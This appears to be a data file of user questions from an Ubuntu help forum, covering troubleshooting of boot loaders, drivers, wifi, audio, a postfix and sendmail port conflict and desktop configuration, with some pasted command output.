404999	deleted windows partition from ubuntu and now ca n't boot	i recently was performing a fresh install of windows on one of the partitions on my ssd and for some reason i decided to delete the windows boot partition from within ubuntu before cloning over a factory reset version of windows from another drive ( using clonezilla ) . all i ever touched was the big c : partition i had been using for windows , but when i rebooted , i could n't even access ubuntu : the windows boot manager i had been using to dual boot still showed both options but both of them gave me errors that it could n't find bootable media . what do you think happened ? did i screw up my mbr ? i 've connected the drive to another system using a usb-sata connection and it shows the volumes i 'd expect still there , but the ubuntu partition now shows up as raw . i 'm worried that i may not be able to recover my ubuntu installation which is exactly what i was trying to avoid . since then i 've done various things to do a fresh install of windows on the old ( newly reformatted ) partition , including using the windows installation disk and each time the installation is supposedly successful but the computer will never boot into an os . repairs to the mrb do n't seem to have any affect . i 'm going to try and save an image of the raw partition that used to contain ubuntu , wipe the drive , and try cloning a drive that is booting properly , but i do n't know what i should do to make sure that i can get my ubuntu install back . i have saved an image to a exfat usb and i can also make a partition-partition backup on another drive ( using clonezilla ) but i do n't know what format the target partition should be . i ca n't make it ext4 in windows and i ca n't make it raw either . someone please help ! what did i do when i deleted my windows partition from within ubuntu ? thanks .
405002	netbeans 7.4 refuses to close ?	i am using ubuntu 13.10 and have netbeans 7.4 whenever i close netbeans it restart and keep doing that until i restart my computer and same story . edit can i do something with netbeans which close it and i am not asking for finding process id and kill it . downloaded the netbeans from its website .sh extension . netbeans ide 7.4 if i try to run it with sudo from terminal sudo netbeans it says sudo : netbeans : command not found if netbeans is installed with sudo apt-get install netbeans its fine and have no problem but they have older version netbeans 7.0.1 what should i do to solve this problem ?
405006	stuck at dollar prompt	i have an acer laptop and running ubuntu 12.04 . i tried updating it and i then fell asleep and when i woke i tried restarting it . it then asked me to login by this prompt : ubuntu 12.04.3 lts username-laptop tty1 username-laptop login : i logged in and filled the password and i get to this prompt : username @ username-laptop : ~ $ so my question is what do i do next ?
405007	migrating ubuntu server	okay , so here is where i 'm at : i had been using an old white macbook as an ubuntu server running the server edition of 13.04 amd64+mac . i have everything configured exactly as i want it ( ssh , samba , minecraft server , plex media server , etc. ) . i want to migrate my configuration to an asus x200ca running 13.04 server edition . i have tried cloning the hdd via clonezilla and `` dd '' , but learned that this wo n't work because of hardware differences . i have also tried dpkg to list all packages and reinstall on the new server , and this does n't work either . i do n't particularly mind reinstalling some packages , but it 's there a quick and simple way to migrate my configuration of services from the old server to the new ? there is so much conflicting information out there that i ca n't make heads or tails of it all .
405009	network manager problems	ok this happended : my wifi didnt work , i installed wicd , disabled networkmanager , rebooted and wicd didnt work , i deleted wicd and have had problems since then so i guess its network related . now all i see is a _ i blinking in the dark . when i boot ubuntu 13.10 i get a waiting for network donfiguration , 60sec more and then _. i tried different things like edit the interfaces but that doesnt work . i cant go into recoverymode , it just goes blank . im not too sure what to do about this really . alot if my files will go missing if i dont get into this system again . : /
405012	format a removable media device without password	i want to format a usb flash drive , and it really is a pain to enter the administrative account just for that , and moreover does that mean that a user who own a usb drive ca n't format it if he does n't know the root password ? i understand that formatting a drive is a risky task , and obviously has to be protected when the drive being formatted is 'system ' partition ( for example is you have the /home at a different disk partition ) , but i do n't see why formatting an external usb should be protected . so , is there an easy way to format removable media ( usb flash , sd cards , etc ... ) without needing root access and without creating a security hole by grating format privileges to anyone ( or more properly to any device ) ? btw , i 'm using the kde desktop so if the solution is kde better . terminal solutions are also acceptable but i would really like it to be more user friendly ( gui ) .
405014	how to put the 'ctrl ' key over the 'win ' key in ubuntu 13.10 ?	in previous versions of ubuntu , one could allow the keyboard option to map the ctrl key on the â win key . this is very useful for users who constantly have to switch between os x and ubuntu . is there any clean way to do it through the ubuntu interface ? i have also tried using an .xmodmap configuration ( see how do i remap command key to be the control key on a macbook 4,1 ? ) . it works when i run manually xmodmap on the file , but i seem to be unable to make it the default option ( e.g . : i need to run the script every time i log in ) . any ideas on how to solve this ? has this option vanished forever ?
405015	command to restart single usb port	my mouse is broken and it disconnects from time to time . unplugging and plugging it again works - it reconnects and works fine until next time ( disconnects every hour or so so it 's tolerable ) . when i 'm running windows , after disconnects it reconnects again automatically . on ubuntu i have to do it manually . i 'd like to have a script that would just restart a particular port on a keyboard shortcut ( like ctrl + alt + u ) . how do i restart a particular port ? i know - i should just get a new mouse , but first - i 'm a lazy bum , and 2nd - microsoft has a solution to this problem , ubuntu does n't - why not write one : ) cheers , jony
405017	problem with installation in virtualbox	im trying to install ubuntu in my vm and everything works pretty good until i come to '' who are you '' part in the installation progress . when i reach that step my mouse and keyboard stops to work in the vm and the `` host key '' doesnt work either . i have tryed to reinstall and same thing happens : s hope somebody can give me a clue =/
405018	can i free permissions on a usb drive ?	i need a simple way to change permissions so that anyone can read and write anywhere on the drive . if it can be done without the terminal , so much the better ! long version : 3 years ago i bought a buffalohd-pxtu2 1 terabyte usb drive for archiving . at the time my wife and i both had windows xp , but we wrote to the drive directly rather than using the buffalo windows utility provided . 2 years ago i installed kubuntu 12.04 on my computer , though still use xp occasionally . still no problems copying . a year ago my wife 's computer blew up and she bought a pretty imac . i can not get the mac to write to the buffalo drive , though it will read . i believe the problem is that kubuntu has at some stage taken over and hijacked the permissions , though i can still write with xp . in fact , after my wife 's computer blew up , i copied data from her hard drive to the buffalo drive and thence later to the new mac . whatever the cause , i need a simple way to change permissions so that anyone can read and write anywhere on the drive . if it can be done without the terminal , so much the better !
405019	ubuntu 13.10 does n't shutdown ( power off ) on acer s7-392 dual boot windows 8.1	i have an acer s7-392 . it has windows 8.1 on it ( which i need to keep ) and i have installed unbuntu 13.10 on it as well . when installing unbuntu i decided to have no swap set up as it has 8gb of ram . secureboot is on and unbuntu was installed with uefi on . i can restart from within unbuntu ( takes 5-10s ) , but if i try and shutdown to power off the shutdown stops and the laptop remains on . the fans kick after a while so it seems to be trying to do something . i have disabled the splash screen by changing the grub configuration . on shutdown i simply see the following nm-dispatcher.action : caught signal 15 , shutting down ... [ fail ] * deactivating swap ... * unmounting local filesystem ... . [ ok ] * will now halt [ ok ] [ xxxx ] mei_me 0000:00:16.0 : stop [ xxxx ] reboot : power down ( xxxx are time stamps ) what i have tried sudo shutdown -p now setting `` acpi=force '' in grub configuration and updating i.e . grub_cmdline_linux= '' acpi=force '' setting `` acpi=off '' in grub configuration and updating i.e . grub_cmdline_linux= '' acpi=off '' note sudo shutdown -r now works but it takes about 5 - 10 seconds i presume the nm-dispatcher.action fail is n't good . strange it will restart but not power off . what steps do i need to take ? update 24/01/2014 i have made a bootable usb of a trusty tahr daily build and tried that today ( 24/01/2014 ) . when i shutdown , it works without fail ( done it 5 times in a row ) . i wonder if it is a driver issue ? i do n't really want to use a alpha version yet . anyone any ideas ?
405024	how to `` fix '' the size of windows button item in xfce4-panel 4.10.1	just finished installing ubuntu 13.10 with xubuntu desktop and i tried to have a `` windows 7 '' look ( i know , some of you will hate me but after 15 years using windows , it is hard to loose the habit of the bottom bar and the start menu . however , after fallowing the pcworld guide how-to-make-ubuntu-linux-look-like-windows-7 installing and customizing xfce , i would like to fix the panel i have set up . even if i followed the guide entirely , when i added the window buttons item , i realized that it has a dynamic size and does n't look like the guide ... .all the items `` on the right side '' ( separator , notification area , indicator plugin , show desktop ) do not stay fixed but they move from left to right and right to left depending how many `` windows '' i open . : anyone of you has an idea how to fix the size so i will have my bar looking like the windows on with the start button on the left , the clock and plugins on the right and then the middle empty when windows are not opened ? thank you
405026	how can i get the tripp-lite kvm switch work on ubuntu ?	i have a tripp-lite kvm switch model b020-008 and i 'm trying to get it to work on ubuntu version 10.04 lts and 12.04 lts but for some reason it only barely works on 10.04 lts meaning the mouse barely moves and keyboard does not work at all . is there a package in the repositories that could make this device work ? i tried going on tripp-lite 's website but found no drivers nor firmware for it . heck not even for windows there is nothing on this ; only a manual . i 'm guessing it should be plug and play but it does n't .
405036	black screen after install official closed amd graphich driver on 8850m card	i bought a dell 3537-157813 laptop with amd radeon 8850m . i installed for it the latest amd catalyst driver from amd.com but after reboot the computer ive got black screen with only visible my cursor ... after i reinstalled my system and used the closed driver in the software sources but i got the same result ( black screen with my cursor ) tried ubuntu : 12.04 and 13.10 both same result amd catalyst : 13.11 anyone does any idea ? or maybe faced with same issue in amd 8000 series ? black screen after install official closed amd graphich driver on ra ati 8850m closed driver dell
405038	how do i find what command created an existing window ?	in the system monitor application ( gnome-system-monitor ) , there is a column titled `` command line '' that gives the command ( complete with arguments ) that was used to create that window . is there a command that allows you to select a window via clicking ( like xkill ) , then returns the command called for that window ?
405043	network problems after installing wireless usb adapter	some time ago i tried to install an edimax 150mbps wireless ieee802.11b/g/n usb adapter for my lenovo t60 for better wifi performance . it did n't really work out properly , at least i had the feeling the usb adapter mashed up abit with my internal card intel r60e/x60s . i uninstalled the realtalk 802.11n adapter driver and now i have problems with my normal wireless connection : network manager connects without problem but it seems that i 'm still not online whatsoever . reset/restart of networkmanager or ifconfig wlan0 up do n't change anything . pinging for www.google.com gets me an unknown host , where ping on 8.8.8.8 seems to work normally . ifconfig shows me that wlan0 is connected to a inet addr , so i have no more ideas where and what i could try to solve this problem . since i can go online via skype i thought it might be a browser problem but also synaptic and software center get me error messages . any ideas ? thx
405045	please help a noob out with installing ubuntu	so i am brand new to linux . i have an older laptop that is collecting dust and am trying to install ubuntu 12.04.3 onto it . it 's a dell studio 1735 running vista 64bit that i bought back in 08 . i have the iso on a usb drive , done with `` unetbootin '' . i formatted the drive to fat32 before loading anything onto it . from what i understand , i get to the boot menu , go to `` boot from usb '' , and select `` install ubuntu '' from the unetbootin menu . i get the menu , but if i click on any option in there ( all option are listed twice for some reason ) the ubuntu screen ( purple screen with red dots underneath `` ubuntu '' ) will come up for about a minute or so , then it will bring me back to the unetbootin screen . but the menu will be shrunken up and up in the corner , and underneath it will be some text . `` busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4.1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ '' i can input commands here , and the help menu will come up but i do not know what i 'm doing . and from what i understand i should n't need to do any command prompt stuff to just get it to install . i took a video in case i 'm not explaining this well enough : link here any help is really appreciated .
405047	gmail-notify gnome-shell extension not working on gnome-shell 3.8.4	i installed the gnome shell extension gmail notify on linux ubuntu 13.10 . i am using gnome-shell 3.8.4 . it does n't show the e-mails , it just says `` 0 ( 0 ) '' even though i have plenty of unopened emails in gmail . i tried installing gir1.2-soup , gir1.2-goa and gir1.2-glib and restarted the shell but it does n't work . i reinstalled the extension but the problem is not solved . how to fix it ?
405048	vbox on ubuntu could not read from boot medium ! system halted error	im using virtual box on ubuntu . and win xp as a guest i facing a problem im getting '' could not read from boot medium ! system halted error '' here is a pic of my vb settings for that vmacine i had been using vbox rom about a year and i 'm pressy sure that i had mounted the iso beside that win 7 had never made this problem and i used that same way to make the xp vm and i had tried to uncheck the floppy and i made sure that the boot order is correct still no luck any ideas ?
405049	anybody having problems with 13.10 updated software and nvidia drivers ?	i have a hp pavilion laptop with an nvidia gpu . with each major upgrade of the ubuntu os i 've had a battle getting the nvidia driver to behave , but each time i have managed it . a while ago i updated to 13.10 , went through the usual dance , and got it working . a few days ago , however , i did a minor software update and now the graphics driver is completely hosed . after much fiddling its now got to the point where i 'm completely stumped as to how to proceed . the repeatable sequence i can do is : boot into kernel 3.11.0-15-generic when it tries to boot x , the nvidia splash screen fails with lots of picture noise a primitive dialog pops up to say that the system is running in low graphics mode . none of the options presented in that and subsequent dialogs seem to help . i ctl-alt-f1 into the console and check that : sudo apt-get install nvidia-331 which seems to be the latest driver from nvidia . i select it using : sudo jockey-text -l sudo jokey-text -e kmod : nvidia-331 which runs fine . this does n't load the module in however , so i force it : sudo lsmod | grep nvidia sudo modprobe nvidia_331 sudo lsmod | grep nvidia and the last lsmod now shows the module is loaded with 0 users of it . then i run : sudo /etc/init.d/lightdm start this time x comes up with the nvidia splash screen , and then finally the usual ubuntu login screen . logging into that does bring up my desktop , but without any of the unity trappings such as the icons in the left or the bar on the top or any display manager . a `` system program problem detected '' dialog pops up , but gives me no details as to what it actually is . then when i reboot , it 's back to square one where the nvidia driver needs to be reset in jockey and modprobe'ed again - it 's not retaining that information . clearly nvidia drivers are fragile at the best of times , but any help from people who might have been through this same pain would be greatly appreciated .
405051	safe to use cpufreq	i have a hp pavilion dv5220us with a dual core t2050 ( 1.6ghz , 2m l2 cache , 533mhz fsb. ) . i was womdering if it is safe to use cpu freq . the applet for ubuntu 12.04 .
405052	wifi works on live cd but not when i boot from hd	i have been installing different variants of ubuntu over the last couple of days . i have installed linux mint , lubuntu , kubuntu , xubuntu , es luma . the following behavior is present in all of them . wifi works while in live usb , but stops working once i boot from hard disk . i have no idea why . i have gone over so many solutions online that i do n't know where to start . ** the following si the resuult of some of the commands that i ran sudo rfkill list waly @ waly-ideapad-z570 : ~ $ sudo rfkill list [ sudo ] password for waly : 0 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes 5 : hci0 : bluetooth soft blocked : no hard blocked : no waly @ waly-ideapad-z570 : ~ $ sudo ifconfig waly @ waly-ideapad-z570 : ~ $ sudo ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1 : a1:84:4d inet addr:192.168.1.106 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :f2de : f1ff : fea1:844d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:40557 errors:0 dropped:0 overruns:0 frame:0 tx packets:34600 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:57457240 ( 57.4 mb ) tx bytes:2683630 ( 2.6 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:745 errors:0 dropped:0 overruns:0 frame:0 tx packets:745 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:68224 ( 68.2 kb ) tx bytes:68224 ( 68.2 kb ) sudo lshw -c network waly @ waly-ideapad-z570 : ~ $ sudo lshw -c network *-network disabled description : wireless interface product : centrino wireless-n 1000 [ condor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 74 : e5:0b:72 : bb:66 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.11.0-15-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:45 memory : f1500000-f1501fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 05 serial : f0 : de : f1 : a1:84:4d size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.1.106 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : f1404000-f1404fff memory : f1400000-f1403fff sudo modprobe iwlwifi dmesg | grep iwl waly @ waly-ideapad-z570 : ~ $ sudo modprobe iwlwifi waly @ waly-ideapad-z570 : ~ $ dmesg | grep iwl [ 12.879198 ] iwlwifi 0000:03:00.0 : ca n't disable aspm ; os does n't have aspm control [ 12.879324 ] iwlwifi 0000:03:00.0 : irq 45 for msi/msi-x [ 13.039566 ] iwlwifi 0000:03:00.0 : loaded firmware version 39.31.5.1 build 35138 op_mode iwldvm [ 13.169710 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debug disabled [ 13.169711 ] iwlwifi 0000:03:00.0 : config_iwlwifi_debugfs enabled [ 13.169712 ] iwlwifi 0000:03:00.0 : config_iwlwifi_device_tracing enabled [ 13.169713 ] iwlwifi 0000:03:00.0 : config_iwlwifi_p2p disabled [ 13.169714 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 13.169807 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 13.176934 ] iwlwifi 0000:03:00.0 : rf_kill bit toggled to disable radio . [ 13.246301 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' waly @ waly-ideapad-z570 : ~ $ the following is what i have tried and it does n't work it shows that it is hard blocked but it is not . the button on my laptop is to the right , where it should be , and bluetooth is on . i toggle it back and forth but it only keeps turning bluetooth on and off . i tried it on the live usb and it was working fine . it was turning the wifi on and off . i have gone to bios and reset bios to make sure that my laptop would reset the switch , that did n't work i am ready to do what ever it takes to fix this , but i currently have got no idea what else to do . edit : lsmod for harddisk install http : //paste.ubuntu.com/6748161/ now strangely it is not working in live usb either : s. here is the lsmod ( read edit2 below ) i tried both ubuntu 13.10 live cd and linux mint 16 cinnamon live usb , they are both now not working . sudo rfkill list shows that it is being hard blocked . i am going crazy now . i am about to give up and load **ing windows back incase anyone doubted that the bios has wireless or wifi disabled . here is a pic ! [ picture of bios ] [ 1 ] http : //i.stack.imgur.com/tdk0b.jpg ( remove the spaces ) i need 10 reputation to post images or more than 2 links edit2 : ok i installed windows xp and then updated my bios as there was an update for it . i am currently booting ubuntu off a live usb and wifi is working fine . i got the lsmod now . http : //paste.ubuntu.com/6764089/ wish me luck , i am going to install ubuntu and hopefully its gonne work . keeping my fingers crossed .
405054	high-frequency noise in speakers and headphones	i am on a dell 15r n5110 laptop with only ubuntu 12.04.3 lts installed . the laptop has and idt high definition chip 92hd87b1/3 . it appears correctly recognised as the codec under hda intel pch . basic setup *check edit i have an awful high-frequency interference noise in both my headphones and speakers , but at least when on speakers it 's not loud enough to bother me . using the headphones is almost impossible , though . i have read around and have tried installing the daily build of the dkms drivers for intel hda - not successful . i tried modifying /etc/modprobe.d/alsa-base.conf by adding the line options snd-hda-intel model=generic - not successful . i tried modifying /etc/pulse/default.pa with load-module module-udev-detect tsched=0 instead of load-module module-udev-detect- not successful . also , i tried isolating the device that is giving off the noise through alsamixer . the result is the following : i can not mute nor disable mic out/mic in/internal mic/line in/digital in ( setting the volume to 0 has no effect ) i can mute master/speakers/headphones/beep ( muting , even master , has no effect ) i can disable capture ( helped a bit ) thus , i was able to reduce the noise significantly by disabling capture . i also tried disabling left or right channel only , but the noise remains strong until i disable both . my problem is that when i disable capture , my internal mic is muted , which defeats the purpose of having it . after all , i want to be able to skype/hangout with people using my headphones and my internal mic like any other normal person . when i had windows installed previously , there was no such problem , meaning it 's not a hardware issue . ( i do n't want to go back to windows , so that solution is out of the question . ) the way i understand the situation is that capture is the `` service '' that gets the input sounds in a mix so they can be recorded/outputted , but it should not be able to send them directly to the output . so the problem is somewhere after that . but i have no idea what is controlling it and how to influence it . tl ; dr : disabling capture in alsamixer helps , but does n't solve the problem . so what do i do ? edit : the daily drivers have changed the audio setup a bit , but the problem still remains the same . new setup
405058	postfix start error port 25 : address already in use	i 'm attempting to get postfix running on my server but keep getting the following error in my /var/log/mail.log : postfix/master [ 5041 ] : fatal : bind 0.0.0.0 port 25 : address already in use i did some searching and found this excellent answer by oli ( regarding this very question ) in which it 's recommended that i basically rid my server of sendmail packages to avoid conflicts , then reinstall postfix , which will in turn install its own brand of sendmail . unfortuantely it did n't quite solve the problem ( see below for how ) . i followed the instructions and ran the following check , to which i received an encouraging response : $ dpkg -s `which sendmail` postfix : /usr/sbin/sendmail however when i started postfix again , i got the same error . as per oli 's contingency , i looked for the process that was hogging port 25 with the following : $ sudo netstat -pel | grep smtp tcp 0 0 localhost.localdom : smtp * : * listen root 35704126 27626/sendmail : mta but here 's where it got confusing : i then looked for the process 27626 but was then told : dpkg-query : no path found matching pattern 27626 connections . i pulled up htop and was able to find the above pid associated with the following command : sendmail : mta : accepting connections i then tried to kill the process with both killall sendmail and killall 27626 and kept getting no process found . the problem is ( besides the obvious ) i do n't know how to interpret these findings . i scrubbed the server of sendmail , so i can only assume that postfix 's own version of sendmail is hijacking the port ? i do n't even know if that makes sense . anyway , if anyone could set me straight on this or at least give some interesting diagnostics questions , i 'd appreciate it . in case it 's useful , i 'm using virtualmin on the server to manage a few different domains and am also running wordpress . many thanks in advance ! in response to a request i 've posted a ps -ef below root @ upsmart : ~ # ps -ef uid pid ppid c stime tty time cmd root 1 0 0 jan12 ? 00:00:00 init root 2 1 0 jan12 ? 00:00:00 [ kthreadd/20017 ] root 3 2 0 jan12 ? 00:00:00 [ khelper/20017 ] root 68 1 0 jan12 ? 00:00:00 upstart-udev-bridge -- daemon root 75 1 0 jan12 ? 00:00:00 /sbin/udevd -- daemon root 110 1 0 jan12 ? 00:00:00 /usr/sbin/sshd -d root 130 75 0 jan12 ? 00:00:00 /sbin/udevd -- daemon root 131 75 0 jan12 ? 00:00:00 /sbin/udevd -- daemon root 175 1 0 jan12 ? 00:00:00 upstart-socket-bridge -- daemon 116 205 1 0 jan12 ? 00:00:03 dbus-daemon -- system -- fork -- activation=upstart root 385 1 0 jan12 ? 00:00:00 /usr/sbin/dovecot -f -c /etc/dovecot/dovecot.conf root 386 1 0 jan12 ? 00:00:04 cron mysql 410 1 0 jan12 ? 00:08:06 /usr/sbin/mysqld dovecot 441 385 0 jan12 ? 00:00:00 dovecot/anvil root 442 385 0 jan12 ? 00:00:00 dovecot/log root 444 385 0 jan12 ? 00:00:00 dovecot/config syslog 445 1 0 jan12 ? 00:00:08 /sbin/syslogd -u syslog bind 474 1 0 jan12 ? 00:00:12 /usr/sbin/named -u bind clamav 844 1 0 jan12 ? 00:01:34 /usr/sbin/clamd clamav 951 1 0 jan12 ? 00:03:27 /usr/bin/freshclam -d -- quiet list 969 1 0 jan12 ? 00:00:00 /usr/bin/python /usr/lib/mailman/bin/mailmanctl -s -q start list 970 969 0 jan12 ? 00:01:03 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=archrunner:0:1 - list 971 969 0 jan12 ? 00:01:10 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=bouncerunner:0:1 list 972 969 0 jan12 ? 00:01:03 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=commandrunner:0 : list 973 969 0 jan12 ? 00:01:07 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=incomingrunner:0 list 974 969 0 jan12 ? 00:01:01 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=newsrunner:0:1 - list 976 969 0 jan12 ? 00:01:05 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=outgoingrunner:0 list 978 969 0 jan12 ? 00:01:06 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=virginrunner:0:1 list 980 969 0 jan12 ? 00:00:00 /usr/bin/python /var/lib/mailman/bin/qrunner -- runner=retryrunner:0:1 root 1410 1 0 jan12 ? 00:00:00 /usr/sbin/saslauthd -a pam -m /var/spool/postfix/var/run/saslauthd -r root 1413 1410 0 jan12 ? 00:00:00 /usr/sbin/saslauthd -a pam -m /var/spool/postfix/var/run/saslauthd -r root 2034 1 0 jan12 ? 00:00:09 /usr/bin/perl /usr/share/usermin/miniserv.pl /etc/usermin/miniserv.con proftpd 2054 1 0 jan12 ? 00:00:07 proftpd : ( accepting connections ) root 2096 1 0 jan12 ? 00:00:13 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf root 2173 1 0 jan12 ? 00:00:15 /usr/sbin/console-kit-daemon -- no-daemon root 2241 1 0 jan12 ? 00:00:07 /usr/lib/policykit-1/polkitd -- no-debug root 4895 1 0 03:15 ? 00:00:00 /usr/sbin/xinetd -dontfork -pidfile /var/run/xinetd.pid -stayalive -in www-data 6494 30181 0 03:41 ? 00:00:06 /usr/sbin/apache2 -k start www-data 6497 30181 0 03:42 ? 00:00:06 /usr/sbin/apache2 -k start www-data 6499 30181 0 03:42 ? 00:00:06 /usr/sbin/apache2 -k start www-data 6500 30181 0 03:42 ? 00:00:07 /usr/sbin/apache2 -k start root 9477 30027 0 05:09 pts/5 00:00:00 sudo ps -ef root 9478 9477 0 05:09 pts/5 00:00:00 ps -ef root 27626 1 0 02:44 ? 00:00:00 sendmail : mta : accepting connections root 27902 110 0 02:51 ? 00:00:01 sshd : root @ pts/4 root 27998 27902 0 02:51 pts/4 00:00:01 -bash root 29931 110 0 02:59 ? 00:00:03 sshd : root @ pts/5 root 30027 29931 0 02:59 pts/5 00:00:00 -bash root 30181 1 0 03:00 ? 00:00:02 /usr/sbin/apache2 -k start www-data 30183 30181 0 03:00 ? 00:00:00 /usr/sbin/apache2 -k start www-data 30636 30181 0 03:06 ? 00:00:13 /usr/sbin/apache2 -k start
405060	file system is 100 % full	recently , my system disk , somehow , got filled up to 92 % . according to the recommendations in the forums , i removed ( using the synaptics ) obsolete version of linux kernels ( which lead to only 62 % of the system filled ) , cleaned the system trash etc ' , even tried to removed emails from evolution ... the computer has been on since then ( for an hour or two ) , and then i 've got a message of the system full ( 100 % ) ! ! ! any suggestions ? ?
405062	want to default the guest account to a full-paged specific website in safari	i work at a school and twice a year we have government exams . i pressed for years to get linux installed on the school computers ( lubuntu 13.04 ) to avoid our constant problem with spam and popups and computer crashes when they were running xp . so far , using linux has been a great success . what i want to do is for when the students logon as a guest user , the system will default to a full-screen safari page , the page where the exam starts . since we have 120 computers , this will save the teachers from having to go to each computer in the morning and load up firefox , type in the default web page , and maximize the screen . we have to use firefox since chromium does not support the online exams . firefox is already installed on the computers . any suggestions as to the simplest method of doing this ? thank you .
405064	is network manager called from an /etc/init.d script ?	i want to run a script to set the hostname on a heavy customized liveusb version of ubuntu 10.04 ( customized means i 'm not ready to update to latest version ) i need the script to run before the network manager calls dhclient . where is network manager invoked in the /etc/rc.d scripts ? if i add a script with update-rc.d with priority 05 , will the script run before network manager invokes dhclient ?
405065	how vulnerable are you by installing a desktop on ubuntu server ?	i 've read around that installing an ubuntu desktop on top of an ubuntu server provides security holes and performance issues . but i ca n't find anywhere as to describe what security holes would develop from doing this ? i am thinking of installing a light weight desktop such as xubuntu . can anyone explain further ? what type of security holes ? do i need to be concerned ? all help is much appreciated !
405066	problems with likewise in ubuntu 13.10	i 've been working with ubuntu 12.04 , it was my first time in this kind of software ; i decided to move on to 13.10 , but i have some problems with this ... under 12.04 , i installed likewise without any problems , now in 13.10 i install it and seems to be allright but when i try to use it , just does n't appear ! ! ! i 've tried uninstalling and re-installing likewise , even re-installing ubuntu 13.10 . i really do n't know what to do . also when i try to modify lightdm.conf to use it for loggin in , it open in blank . is there another option to joining a domain ? i do really appreciate your help askubunters ! ! eduard
405068	i need plan of attack ! please help	i need for someone to help me creating a plan of attack ; ) purpose : setting up dual booting = windows 8.1 + ubuntu 13.10 . present status : both oss are installed in a different hard disks , with messed up booting files . how did i get here ( short version ) : days ago i had unplugged the windows hard disk from the motherboard in order to reinstall ubuntu , and keep things simple while doing it . it all went well , i ran ubuntu successfully for about 5 days , after a good number of tweaks here and there i very happy with what i 've got . my next step was to fix the windows booting files . unfortunately i did n't think of unplugging the ubuntu hard disk this time : ( as you may imagine , this messed up grub . i was able to fix the mbr with the win8 repair startup usb key , using : ''bootrec /fixmbr '' , but the following command failed : ''bootrec /fixboot '' , it replied : ''the volume does not contain a recognized file system . please make sure that all required file system drivers are loaded and that the volume is not corrupted '' . additionally , i proceded to try : ''bcdedit /set { default } device partition=c '' , but i got this : ''the boot configuration data store could not be opened . the system can not find the file specified '' it was after this that my grub got messed up . where to now ? i have boot repair disk , super boot manager , and easybcd . also a usblive with ubuntu 13.10 . at least for now , i don`t need actual details , but rather a clear layout of steps to take . please consider what i want to accomplish , and where i am . example : start by 1 . repairing the windows booting files , successfully boot into windows . then 2 . do the same for ubuntu : fix grub , then boot from a usblive to run super boot manager to setup the dual boot . the above was just an example , and if anything a wild speculation of what 's ahead . thanks a trillion guys ! jdl
405070	ubuntu on virtualbox on windows 8.1	ok i am a complete computer science newbie here - purchased `` practical computing for biologists '' to learn and first thing they have you do is set up ubuntu on virtualbox within windows to allow access to unix command line - seems a bit of a steep learning curve since i do not know what any of that means yet , but ... anyway , i managed to install virtualbox and download ubuntu - when trying to set-up virtual machine , i get stuck at several steps - any pointers ?
405071	static and crackling in my hdmi audio ?	so , i managed to dual boot windows 8.1 and ubuntu 13.04 . in ubuntu 13.04 , i installed the drivers for my graphics card ( amd hd radeon 7700 series , i 'm pretty sure it 's a 7790 one and intel hd graphics 4600 for motherboard , but this should n't be necessary , considering that it 's not the motherboard where i have connected the hdmi ) for hdmi . i went to system settings , and then to sound , selected the hdmi sound option . now , whenever i play anything that has sound , the audio has static and crackling . it does not play correctly . i tried searching , but all i find is questions in which the hdmi audio is simply not recognized and not playing .
405072	what drivers should i use for my printer ?	i have an hp laserjet and when i print some pages , the printer prints really slow . sometimes it even takes hours . i already have gutenprint , but it is still slow . edit : no i did not use hplip . having that said , i will try it . second edit : it worked ! thanks virtualxtc .
405073	making the xinput -- set-button-map changes permanent	i have a new mouse which runs on bluetooth , but i had to setup the middle mouse button manually using xinput -- set-button-map . this is n't persistent after reboot , so i wrote a small python script to run it automatically after login . unfortunately , it does n't work because there is some delay before the mouse automatically reconnects after login . i thought of just adding some wait into my script , but i 'm sure there must be a better way to do this . can i hook into connect events from /usr/sbin/bluetoothd or something like that instead ?
405085	volume adjuster and icon at the top of the screen is missing	click here to see the picture . as you can see there is no sound icon and i cant adjust the sound without going into the sound settings every time .
